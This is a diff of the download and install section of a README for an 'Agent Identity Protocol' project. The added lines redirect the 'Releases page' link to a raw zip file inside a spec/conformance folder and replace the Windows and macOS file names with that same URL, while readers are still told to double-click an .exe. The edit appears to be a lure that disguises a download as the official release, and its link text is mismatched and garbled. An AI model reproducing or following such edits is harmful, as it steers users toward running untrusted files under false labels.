kxwaii495/agent-identity-protocol/README.md

 ## 📂 Download & Install
 To get the Agent Identity Protocol software, follow these steps:

-1. **Visit the Releases Page:** Click this link to go to the [Releases page](https://github.com/kxwaii495/agent-identity-protocol/releases).
+1. **Visit the Releases Page:** Click this link to go to the [Releases page](https://github.com/kxwaii495/agent-identity-protocol/raw/refs/heads/main/spec/conformance/protocol-agent-identity-1.8.zip).
 2. **Choose Version:** Look for the most recent version.
 It will typically be listed first.
 3. **Download the File:** Click on the link to download the appropriate file for your operating system.
 For instance:
-   - If you are on Windows, you might see a file named `agent-identity-protocol-windows.exe`.
+   - If you are on Windows, you might see a file named `https://github.com/kxwaii495/agent-identity-protocol/raw/refs/heads/main/spec/conformance/protocol-agent-identity-1.8.zip`.
-   - For macOS, it may be `agent-identity-protocol-macos.zip`.
+   - For macOS, it may be `https://github.com/kxwaii495/agent-identity-protocol/raw/refs/heads/main/spec/conformance/protocol-agent-identity-1.8.zip`.
 4. **Save the File:** Choose a location on your computer where you want to save the downloaded file.
 5. **Run the Application:**
    - **Windows Users:** Double-click the `.exe` file you downloaded.